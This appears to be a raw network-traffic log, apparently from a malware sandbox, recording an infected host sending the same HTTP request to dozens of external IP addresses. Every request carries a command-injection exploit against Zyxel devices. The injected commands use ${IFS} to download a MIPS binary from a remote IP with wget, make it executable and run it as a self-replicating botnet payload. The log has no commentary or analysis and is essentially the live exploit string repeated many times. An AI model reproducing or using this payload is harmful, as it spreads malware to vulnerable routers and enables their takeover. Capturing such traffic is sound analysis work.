                                        Jan 14, 2024 16:18:38.298877954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2479192.168.2.1342914163.47.36.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298923016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2480192.168.2.135375431.111.212.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.298945904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2481192.168.2.134407871.221.172.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299015045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2482192.168.2.1355916200.176.204.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299061060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2483192.168.2.135984883.87.193.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299089909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2484192.168.2.134520474.55.18.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299133062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2485192.168.2.1359622201.52.48.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299166918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2486192.168.2.1357914211.38.51.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299190998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2487192.168.2.134554032.128.221.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299245119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2488192.168.2.13569601.223.167.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299266100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2489192.168.2.135571238.222.237.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299340963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2490192.168.2.1352010108.91.218.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299391031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2491192.168.2.1352432108.0.150.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299474955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2492192.168.2.1346738198.26.71.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299513102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2493192.168.2.1350956143.157.149.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299565077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2494192.168.2.1345598112.205.50.208443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299606085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2495192.168.2.1352640198.73.204.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299639940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2496192.168.2.1337334185.151.226.235443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299691916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2497192.168.2.1333396160.113.179.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299717903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2498192.168.2.134577899.214.159.146443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299777031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2499192.168.2.1336858177.136.67.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299814939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2500192.168.2.1346746207.24.185.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299860001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2501192.168.2.1359546202.48.208.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299905062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2502192.168.2.133512495.95.24.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299957991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2503192.168.2.1354882196.145.35.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.299978018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2504192.168.2.1357580197.32.181.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300015926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2505192.168.2.1340872204.164.182.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300069094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2506192.168.2.1336254164.51.201.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300103903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2507192.168.2.133794080.249.127.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300142050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2508192.168.2.133817876.194.150.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300205946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2509192.168.2.134964017.7.25.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300246954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2510192.168.2.134131889.251.228.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300280094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2511192.168.2.133783884.10.215.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300353050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2512192.168.2.1349822198.225.118.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300429106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2513192.168.2.1335344170.102.5.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300451040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2514192.168.2.135027467.191.87.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300492048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2515192.168.2.135649064.16.170.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300544024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2516192.168.2.1360994124.88.198.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300580025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2517192.168.2.134166652.149.175.78443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300616980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2518192.168.2.1357060139.71.200.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300641060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2519192.168.2.135425675.210.7.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300698042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2520192.168.2.1344662146.86.74.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300743103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2521192.168.2.1354766213.34.239.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300765991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2522192.168.2.133585827.186.148.129443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300812960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2523192.168.2.135134676.22.183.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300858021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2524192.168.2.1351022200.196.124.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300968885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2525192.168.2.135928457.19.113.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.300997972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2526192.168.2.1357008116.134.244.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301055908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2527192.168.2.133606442.68.15.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301069021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2528192.168.2.13360325.238.67.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301086903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2529192.168.2.135131651.195.138.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301134109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2530192.168.2.136011076.156.220.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301162958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2531192.168.2.1347240116.93.105.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301230907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2532192.168.2.1349490156.184.207.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301273108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2533192.168.2.1353794205.200.82.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301306009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2534192.168.2.1334422136.198.152.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301340103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2535192.168.2.1357072122.34.209.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301369905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2536192.168.2.1336036204.204.115.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301388979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2537192.168.2.134580044.94.176.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301436901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2538192.168.2.1351280102.72.235.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301465034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2539192.168.2.1356034137.136.6.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301512957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2540192.168.2.1359578213.213.211.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:38.301528931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2541192.168.2.135946673.144.69.51443
                                        TimestampBytes transferredDirectionData
